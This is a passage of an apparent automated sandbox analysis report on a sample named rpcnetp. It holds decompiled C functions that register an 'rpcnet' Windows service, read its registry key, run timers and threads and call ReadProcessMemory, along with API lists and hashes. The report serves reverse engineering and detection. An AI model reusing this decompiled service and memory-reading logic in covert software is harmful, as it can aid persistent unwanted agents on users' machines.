								if(_t20 != _t33) {
									WaitForSingleObject(_t20, 0xffffffff);
									CloseHandle( *0x72b260ac);
									 *0x72b260ac = _t33;
								}
								WaitForSingleObject(_v12, 0xffffffff);
								CloseHandle(_v12);
							}
							E72B22FBB(_t35, _t33);
							goto L23;
						}
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t38 - _t33;
					if(_t38 != _t33) {
						goto L17;
					}
					E72B21EDA();
					goto L23;
				} else {
					_t26 =  *0x72b26008;
					 *0x72b26004 = _t33;
					_t46 =  *((intOrPtr*)(_t26 + 0x28)) - _t33;
					if( *((intOrPtr*)(_t26 + 0x28)) != _t33) {
						 *0x72b26038 = 1;
						SetStdHandle(0xfffffff6, _v8);
						goto L11;
					}
					 *0x72b26038 = 2;
					_t34 = E72B22123(_t33, _t36, CloseHandle, _t38, _t46);
					 *( *0x72b26008 + 0x28) = 1;
					_t30 = E72B22ADB(_t34, _t35, _t36, CloseHandle, _t38, _t46, _t34);
					asm("sbb esi, esi");
					_t38 =  ~_t30 + 1;
					if(_t34 != 0) {
						CloseHandle(_t34);
					}
					if(_t38 != 0) {
						_t33 = 0;
						__eflags = 0;
						goto L11;
					} else {
						E72B22FBB(_t35, _t38);
						_t33 = 0;
						L23:
						if(_v8 != _t33) {
							CloseHandle(_v8);
						}
						ExitProcess(_t33);
					}
				}
			}

















0x72b232e7
0x72b232ed
0x72b232ef
0x72b232fa
0x72b23300
0x72b23300
0x72b23310
0x72b2331e
0x72b23322
0x72b2338f
0x72b2338f
0x72b23394
0x72b23396
0x72b233a3
0x72b233a6
0x00000000
0x00000000
0x72b233a8
0x72b233aa
0x72b233b1
0x72b233bb
0x72b233c0
0x72b233cd
0x72b233d3
0x72b233d6
0x72b233d8
0x72b233da
0x72b233e5
0x72b233e7
0x72b233ec
0x72b233f4
0x72b233f6
0x72b233f6
0x72b23401
0x72b23406
0x72b23406
0x72b23409
0x00000000
0x72b23409
0x72b233ac
0x72b233af
0x00000000
0x00000000
0x00000000
0x72b233af
0x72b23398
0x72b2339a
0x00000000
0x00000000
0x72b2339c
0x00000000
0x72b23324
0x72b23324
0x72b23329
0x72b2332f
0x72b23332
0x72b23379
0x72b23385
0x00000000
0x72b23385
0x72b23334
0x72b23343
0x72b2334b
0x72b23352
0x72b2335b
0x72b2335d
0x72b23360
0x72b23363
0x72b23363
0x72b23367
0x72b2338d
0x72b2338d
0x00000000
0x72b23369
0x72b2336a
0x72b2336f
0x72b2340e
0x72b23411
0x72b23416
0x72b23416
0x72b23419
0x72b23419
0x72b23367

APIs
  • GetVersion.KERNEL32 ref: 72B232E7
  • GetStdHandle.KERNEL32(000000F4), ref: 72B23309
  • CloseHandle.KERNEL32(00000000), ref: 72B23363
  • SetStdHandle.KERNEL32(000000F6,?,00000000), ref: 72B23385
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 72B233B5
  • CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B233CD
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B233EC
  • CloseHandle.KERNEL32 ref: 72B233F4
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B23401
  • CloseHandle.KERNEL32(?), ref: 72B23406
  • CloseHandle.KERNEL32(?,00000000), ref: 72B23416
  • ExitProcess.KERNEL32 ref: 72B23419
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Close$CreateObjectSingleWait$EventExitProcessThreadVersion
  • String ID:
  • API String ID: 2472693224-0
  • Opcode ID: 27bce71e7147c629c4f655e00d6e1af80deb3abbae097ad88cdb8826969ffa36
  • Instruction ID: 016aedef878e6635e219e695dc34082c73d5b5be0daf8870531cd6c57efd487a
  • Opcode Fuzzy Hash: 27bce71e7147c629c4f655e00d6e1af80deb3abbae097ad88cdb8826969ffa36
  • Instruction Fuzzy Hash: 3A310072440314EFCB216F6ACDC4A4B3EF8DB443E67224A2DE51AE3152D7304D89DB54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B2351D(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				int _t13;
				long _t17;
				void* _t18;
				void* _t20;
				void* _t23;
				_Unknown_base(*)()* _t31;
				void* _t34;
				void* _t35;
				struct HWND__* _t37;

				_t35 = __edx;
				_t37 = _a4;
				_t13 = _a8;
				_t31 = 0;
				if(_t13 == 0) {
					L17:
					KillTimer(_t37, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t37, 0x113, 0x113, 1) != 0);
					PostQuitMessage(_t31);
					if(_a8 != 0x11) {
						L12:
						_t17 = 0;
						L21:
						return _t17;
					}
					L20:
					_t17 = DefWindowProcA(_t37, _a8, _a12, _a16);
					goto L21;
				}
				_t18 = _t13 - 0xf;
				if(_t18 == 0) {
					 *0x72b26088 = 1;
					 *0x72b2602c = _t31;
					 *0x72b260b8 = _t31;
					L11:
					if(E72B22EA1(_t34, _a16) == 0) {
						_t20 =  *0x72b260ac;
						if(_t20 != _t31) {
							 *0x72b26088 = 1;
							SetEvent(_t20);
						}
						if( *0x72b26088 != _t31) {
							goto L17;
						} else {
							SetTimer(_t37, 0x64, 0xdbba0, _t31);
							goto L12;
						}
					}
					goto L12;
				}
				_t23 = _t18 - 0x102;
				if(_t23 == 0) {
					if(_a12 != 0x64) {
						goto L20;
					}
					KillTimer(_t37, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t37, 0x113, 0x113, 1) != 0);
					E72B2327B(_t34, _t35, _t37, 0x113);
					if( *0x72b26038 == 0) {
						SetTimer(_t37, 0x64, 0xdbba0, 0);
					}
					goto L20;
				}
				if(_t23 == 0x2ed) {
					goto L11;
				}
				goto L20;
			}















0x72b2351d
0x72b23529
0x72b2352d
0x72b23530
0x72b23531
0x72b235f4
0x72b235f7
0x72b23602
0x72b23611
0x72b23616
0x72b23620
0x72b235c0
0x72b235c0
0x72b23632
0x72b23636
0x72b23636
0x72b23622
0x72b2362c
0x00000000
0x72b2362c
0x72b23537
0x72b2353a
0x72b235a1
0x72b235a8
0x72b235ae
0x72b235b4
0x72b235be
0x72b235c4
0x72b235cb
0x72b235ce
0x72b235d5
0x72b235d5
0x72b235e1
0x00000000
0x72b235e3
0x72b235ec
0x00000000
0x72b235ec
0x72b235e1
0x00000000
0x72b235be
0x72b2353c
0x72b23541
0x72b23553
0x00000000
0x00000000
0x72b2355c
0x72b23567
0x72b23576
0x72b2357a
0x72b23587
0x72b23596
0x72b23596
0x00000000
0x72b23587
0x72b23548
0x00000000
0x00000000
0x00000000

APIs
  • KillTimer.USER32(?,00000064), ref: 72B2355C
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B23570
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B23596
  • SetEvent.KERNEL32(?), ref: 72B235D5
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B235EC
  • KillTimer.USER32(?,00000064), ref: 72B235F7
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B2360B
  • PostQuitMessage.USER32(00000000), ref: 72B23616
  • DefWindowProcA.USER32(?,00000011,?,?), ref: 72B2362C
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Timer$Message$KillPeek$EventPostProcQuitWindow
  • String ID: d
  • API String ID: 2149785620-2564639436
  • Opcode ID: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
  • Instruction ID: 41688d1bd847d3f0796b27d825ea33bda349e247ae9f5fafea2125377e32a201
  • Opcode Fuzzy Hash: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
  • Instruction Fuzzy Hash: C731D132690314ABE7225A29CC8AF9B3AFDEB45797F11081CF50ED2183D3718558DB21
Uniqueness

Uniqueness Score: -1.00%

APIs
  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 72B2495C
  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 72B2497A
  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 72B24987
  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 72B24994
  • FreeLibrary.KERNEL32(?), ref: 72B249D8
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: AddressProc$Library$FreeLoad
  • String ID: CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$advapi32.dll
  • API String ID: 2449869053-171673395
  • Opcode ID: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
  • Instruction ID: da1224439bb4948f671e8665be7783c961a7690319e1cb8d5b89657dbbdfc4a5
  • Opcode Fuzzy Hash: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
  • Instruction Fuzzy Hash: 97415072900209AFDF12CF55CC84BDA7FB9EF85351F1481AABE09AF145D770A645CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A1495C
  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 00A1497A
  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00A14987
  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00A14994
  • FreeLibrary.KERNEL32(?), ref: 00A149D8
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: AddressProc$Library$FreeLoad
  • String ID: CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$advapi32.dll
  • API String ID: 2449869053-171673395
  • Opcode ID: fce7c67911c0af0a7ec1a690a8e324b2b471ad477e0889dd8751a2e32e61a377
  • Instruction ID: f458583bd07675f1e8cab8fdf3ed999d331f07b1b1f506764321ee9456250a26
  • Opcode Fuzzy Hash: fce7c67911c0af0a7ec1a690a8e324b2b471ad477e0889dd8751a2e32e61a377
  • Instruction Fuzzy Hash: B3415E72900608BFDF11CF54CC85EDA7FB9EF49740F0480A6BE08AF155D6B0AA85CBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E72B22658(void* __ecx) {
				void* _v8;
				long _v12;
				int _t6;
				void* _t11;
				struct HWND__* _t13;
				intOrPtr _t24;

				 *0x72b260a4 = CreateEventA(0, 1, 0, 0);
				 *0x72b26010 = 0x10;
				 *0x72b2601c = 0x42a;
				 *0x72b26020 = 1;
				_t6 = RegisterServiceCtrlHandlerA("rpcnet", E72B21EEB);
				 *0x72b260bc = _t6;
				if(_t6 != 0) {
					_push(0);
					_push(0x1388);
					_t24 = 2;
					_push(_t24);
					 *0x72b26018 = 1;
					E72B22266();
					 *0x72b26018 = 5;
					E72B22266(4, 0, 0);
					E72B22296();
					 *0x72b2601c = 0;
					 *0x72b26020 = 0;
					_t11 = CreateThread(0, 0, E72B23161, 0, 0,  &_v12);
					_v8 = _t11;
					if(_t11 != 0) {
						WaitForSingleObject( *0x72b260a4, 0xffffffff);
						_t13 =  *0x72b2600c;
						if(_t13 != 0) {
							PostMessageA(_t13, 0x11, 0, 0);
						}
						WaitForSingleObject(_v8, 0x7530);
						CloseHandle(_v8);
					} else {
						 *0x72b26020 = _t24;
					}
					CloseHandle( *0x72b260a4);
					_t6 = E72B22266(1, 0, 0);
				}
				return _t6;
			}









0x72b22678
0x72b2267d
0x72b22687
0x72b22691
0x72b22697
0x72b2269d
0x72b226a4
0x72b226ab
0x72b226ac
0x72b226b3
0x72b226b4
0x72b226b5
0x72b226bb
0x72b226c4
0x72b226ce
0x72b226d3
0x72b226e5
0x72b226eb
0x72b226f1
0x72b226f7
0x72b226fc
0x72b22714
0x72b22716
0x72b2271d
0x72b22724
0x72b22724
0x72b22732
0x72b22737
0x72b226fe
0x72b226fe
0x72b226fe
0x72b22743
0x72b2274c
0x72b22751
0x72b22755

APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B22668
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,72B21EEB), ref: 72B22697
    • Part of subcall function 72B22266: SetServiceStatus.ADVAPI32(72B26010,?,72B226C0,00000002,00001388,00000000), ref: 72B2228C
    • Part of subcall function 72B22296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
    • Part of subcall function 72B22296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
    • Part of subcall function 72B22296: RegEnumValueA.ADVAPI32 ref: 72B22300
    • Part of subcall function 72B22296: RegCloseKey.ADVAPI32(?), ref: 72B22309
  • CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B226F1
  • WaitForSingleObject.KERNEL32(000000FF), ref: 72B22714
  • PostMessageA.USER32 ref: 72B22724
  • WaitForSingleObject.KERNEL32(?,00007530), ref: 72B22732
  • CloseHandle.KERNEL32(?), ref: 72B22737
  • CloseHandle.KERNEL32 ref: 72B22743
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Close$CreateHandleObjectServiceSingleValueWait$CtrlEnumEventHandlerMessageOpenPostQueryRegisterStatusThread
  • String ID: rpcnet
  • API String ID: 2965456292-717388198
  • Opcode ID: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
  • Instruction ID: 02e831f8f98af63f743597e7f97a2177f381f5a52501a144112e9f4fabe84738
  • Opcode Fuzzy Hash: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
  • Instruction Fuzzy Hash: 87216BB2591364BBD7315B5B8C88F9B3EE8FB497E2B22091DF209D7142C3740900EBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
			E72B22314() {
				int _t49;
				void _t50;
				long _t52;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;

				_push(0xda4);
				_push(0x72b253c8);
				E72B24A94(_t57, _t61, _t64);
				 *(_t67 - 0x1c) =  *(_t67 - 0x1c) & 0x00000000;
				_t58 = GetStdHandle(0xfffffff4);
				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
				_t62 =  *(_t67 + 8);
				if(ReadProcessMemory(_t58, _t62, _t67 - 0x30, 0x10, _t67 - 0x34) == 0) {
					L16:
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					ExitThread( *(_t67 - 0x1c));
				}
				_t63 = _t62 -  *((intOrPtr*)(_t67 - 0x2c));
				if(ReadProcessMemory(_t58, _t62 -  *((intOrPtr*)(_t67 - 0x2c)), _t67 - 0x20, 4, _t67 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t67 - 0x30) == 0x78 ||  *(_t67 - 0x30) == 0x1bc8) {
					__eflags =  *(_t67 - 0x24);
					if( *(_t67 - 0x24) == 0) {
						goto L15;
					}
					_t49 = ReadProcessMemory(_t58,  *(_t67 - 0x28), _t67 - 0xdb4,  *(_t67 - 0x24), _t67 - 0x34);
					__eflags = _t49;
					if(_t49 == 0) {
						goto L16;
					}
					_t50 =  *(_t67 - 0x30);
					_t59 =  *(_t67 - 0x20);
					_t66 = _t50 +  *(_t67 - 0x20);
					__eflags = _t50 - 0x78;
					if(_t50 == 0x78) {
						_t54 = 0xd80 -  *((intOrPtr*)(_t66 + 8));
						__eflags =  *(_t67 - 0x24) - 0xd80;
						if( *(_t67 - 0x24) > 0xd80) {
							_t59 =  *(_t67 - 0x24) - _t54;
							__eflags =  *(_t67 - 0x24) - _t54;
							E72B215CC(_t63,  *(_t67 - 0x24) - _t54, _t66, 0,  *(_t67 - 0x24) - _t54);
						}
					}
					_t52 = E72B2162F(_t58, _t59, _t66, _t67 - 0xdb4,  *(_t67 - 0x24));
					goto L8;
				} else {
					if( *(_t67 - 0x30) != 0x3708) {
						L15:
						 *(_t67 - 0x1c) = 1;
						 *( *(_t67 - 0x20) + 0x5c) =  *( *(_t67 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_push( *((intOrPtr*)( *(_t67 - 0x20) + 0x3708)));
						if( *(_t67 - 0x28) == 0) {
							_t52 = ResetEvent();
						} else {
							_t52 = SetEvent();
						}
						L8:
						 *(_t67 - 0x1c) = _t52;
					}
					goto L16;
				}
			}














0x72b22314
0x72b22319
0x72b2231e
0x72b22323
0x72b2232f
0x72b22331
0x72b2233f
0x72b2234e
0x72b2241b
0x72b2241b
0x72b22422
0x72b22422
0x72b2235e
0x72b22367
0x00000000
0x00000000
0x72b22371
0x72b223a7
0x72b223ab
0x00000000
0x00000000
0x72b223bf
0x72b223c1
0x72b223c3
0x00000000
0x00000000
0x72b223c5
0x72b223c8
0x72b223cb
0x72b223ce
0x72b223d1
0x72b223d8
0x72b223db
0x72b223de
0x72b223e3
0x72b223e3
0x72b223e9
0x72b223e9
0x72b223de
0x72b223f9
0x00000000
0x72b2237c
0x72b22383
0x72b22400
0x72b22400
0x72b2240a
0x72b22385
0x72b22388
0x72b22392
0x72b2239c
0x72b22394
0x72b22394
0x72b22394
0x72b223a2
0x72b223a2
0x72b223a2
0x00000000
0x72b22383

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22329
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2234A
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22363
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22394
  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2239C
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 72B223BF
  • ExitThread.KERNEL32 ref: 72B22422
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: MemoryProcessRead$Event$ExitHandleResetThread
  • String ID: x
  • API String ID: 2307309678-2363233923
  • Opcode ID: 1046eb34cbdf0b765d3cfa370b9ef56dd7c2329d757a53313fe159436fe1e0ad
  • Instruction ID: 39cbffadf330a72c51dfe75118ffe555f1184d41082d0e839d6b4843e77be50f
  • Opcode Fuzzy Hash: 1046eb34cbdf0b765d3cfa370b9ef56dd7c2329d757a53313fe159436fe1e0ad
  • Instruction Fuzzy Hash: 3E313A71910319EFEB11CBA9CE84EEEBBF9FB08316F104129E516F2091D774AA45CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
			E00A12314() {
				int _t49;
				void _t50;
				long _t52;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;

				_push(0xda4);
				_push(0xa153c8);
				E00A14A94(_t57, _t61, _t64);
				 *(_t67 - 0x1c) =  *(_t67 - 0x1c) & 0x00000000;
				_t58 = GetStdHandle(0xfffffff4);
				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
				_t62 =  *(_t67 + 8);
				if(ReadProcessMemory(_t58, _t62, _t67 - 0x30, 0x10, _t67 - 0x34) == 0) {
					L16:
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					ExitThread( *(_t67 - 0x1c));
				}
				_t63 = _t62 -  *((intOrPtr*)(_t67 - 0x2c));
				if(ReadProcessMemory(_t58, _t62 -  *((intOrPtr*)(_t67 - 0x2c)), _t67 - 0x20, 4, _t67 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t67 - 0x30) == 0x78 ||  *(_t67 - 0x30) == 0x1bc8) {
					__eflags =  *(_t67 - 0x24);
					if( *(_t67 - 0x24) == 0) {
						goto L15;
					}
					_t49 = ReadProcessMemory(_t58,  *(_t67 - 0x28), _t67 - 0xdb4,  *(_t67 - 0x24), _t67 - 0x34);
					__eflags = _t49;
					if(_t49 == 0) {
						goto L16;
					}
					_t50 =  *(_t67 - 0x30);
					_t59 =  *(_t67 - 0x20);
					_t66 = _t50 +  *(_t67 - 0x20);
					__eflags = _t50 - 0x78;
					if(_t50 == 0x78) {
						_t54 = 0xd80 -  *((intOrPtr*)(_t66 + 8));
						__eflags =  *(_t67 - 0x24) - 0xd80;
						if( *(_t67 - 0x24) > 0xd80) {
							_t59 =  *(_t67 - 0x24) - _t54;
							__eflags =  *(_t67 - 0x24) - _t54;
							E00A115CC(_t63,  *(_t67 - 0x24) - _t54, _t66, 0,  *(_t67 - 0x24) - _t54);
						}
					}
					_t52 = E00A1162F(_t58, _t59, _t66, _t67 - 0xdb4,  *(_t67 - 0x24));
					goto L8;
				} else {
					if( *(_t67 - 0x30) != 0x3708) {
						L15:
						 *(_t67 - 0x1c) = 1;
						 *( *(_t67 - 0x20) + 0x5c) =  *( *(_t67 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_push( *((intOrPtr*)( *(_t67 - 0x20) + 0x3708)));
						if( *(_t67 - 0x28) == 0) {
							_t52 = ResetEvent();
						} else {
							_t52 = SetEvent();
						}
						L8:
						 *(_t67 - 0x1c) = _t52;
					}
					goto L16;
				}
			}














0x00a12314
0x00a12319
0x00a1231e
0x00a12323
0x00a1232f
0x00a12331
0x00a1233f
0x00a1234e
0x00a1241b
0x00a1241b
0x00a12422
0x00a12422
0x00a1235e
0x00a12367
0x00000000
0x00000000
0x00a12371
0x00a123a7
0x00a123ab
0x00000000
0x00000000
0x00a123bf
0x00a123c1
0x00a123c3
0x00000000
0x00000000
0x00a123c5
0x00a123c8
0x00a123cb
0x00a123ce
0x00a123d1
0x00a123d8
0x00a123db
0x00a123de
0x00a123e3
0x00a123e3
0x00a123e9
0x00a123e9
0x00a123de
0x00a123f9
0x00000000
0x00a1237c
0x00a12383
0x00a12400
0x00a12400
0x00a1240a
0x00a12385
0x00a12388
0x00a12392
0x00a1239c
0x00a12394
0x00a12394
0x00a12394
0x00a123a2
0x00a123a2
0x00a123a2
0x00000000
0x00a12383

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A12329
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A1234A
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A12363
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A12394
  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A1239C
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 00A123BF
  • ExitThread.KERNEL32 ref: 00A12422
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: MemoryProcessRead$Event$ExitHandleResetThread
  • String ID: x
  • API String ID: 2307309678-2363233923
  • Opcode ID: 075bcaf98e5dd791630868526e830d259f0e5d8cc60576f0329b115a48e2c5d0
  • Instruction ID: b6af17b0f7911cb0660304d8bb744c489efc4f1456ba042e07f40eac7a05b786
  • Opcode Fuzzy Hash: 075bcaf98e5dd791630868526e830d259f0e5d8cc60576f0329b115a48e2c5d0
  • Instruction Fuzzy Hash: 9131257190021AEFDF21DBE4CD84FEDBBB9BB08314F144169E621B6090D778AA95CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B216BA(struct _CRITICAL_SECTION* _a4) {
				signed char _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;

				_t34 = _a4;
				_t17 =  *(_t34 + 0x1b44);
				if((_t17 & 0x00000001) != 0) {
					 *(_t34 + 0x1b44) = _t17 & 0x000000fe;
					_t19 = _t34 + 0x1b18;
					_a4 = _t19;
					EnterCriticalSection(_t19);
					_t20 =  *(_t34 + 0x1b40);
					if(_t20 != 0) {
						SetEvent(_t20);
					}
					_t21 =  *(_t34 + 0x1b10);
					if(_t21 != 0) {
						SetEvent(_t21);
					}
					_t22 =  *(_t34 + 0x1b0c);
					if(_t22 != 0) {
						WaitForSingleObject(_t22, 0x7d0);
						CloseHandle( *(_t34 + 0x1b0c));
						 *(_t34 + 0x1b0c) =  *(_t34 + 0x1b0c) & 0x00000000;
					}
					_t23 =  *(_t34 + 0x1b40);
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					_t35 =  *(_t34 + 0x1b10);
					if(_t35 != 0) {
						_t23 = CloseHandle(_t35);
					}
					DeleteCriticalSection(_a4);
					return _t23;
				}
				return _t17;
			}











0x72b216be
0x72b216c1
0x72b216c9
0x72b216d2
0x72b216d8
0x72b216e0
0x72b216e3
0x72b216e9
0x72b216f7
0x72b216fa
0x72b216fa
0x72b216fc
0x72b21704
0x72b21707
0x72b21707
0x72b21709
0x72b21717
0x72b2171f
0x72b2172b
0x72b2172d
0x72b2172d
0x72b21734
0x72b2173c
0x72b2173f
0x72b2173f
0x72b21741
0x72b21749
0x72b2174c
0x72b2174c
0x72b21751
0x00000000
0x72b21758
0x72b2175b

APIs
  • EnterCriticalSection.KERNEL32(?), ref: 72B216E3
  • SetEvent.KERNEL32(?), ref: 72B216FA
  • SetEvent.KERNEL32(?), ref: 72B21707
  • WaitForSingleObject.KERNEL32(?,000007D0), ref: 72B2171F
  • CloseHandle.KERNEL32(?), ref: 72B2172B
  • CloseHandle.KERNEL32(?), ref: 72B2173F
  • CloseHandle.KERNEL32(?), ref: 72B2174C
  • DeleteCriticalSection.KERNEL32(?), ref: 72B21751
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: CloseHandle$CriticalEventSection$DeleteEnterObjectSingleWait
  • String ID:
  • API String ID: 2299618653-0
  • Opcode ID: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
  • Instruction ID: 2178e58ac556364a2b17c8ba54c2abf152cba4207c59054d382db62ef48bba22
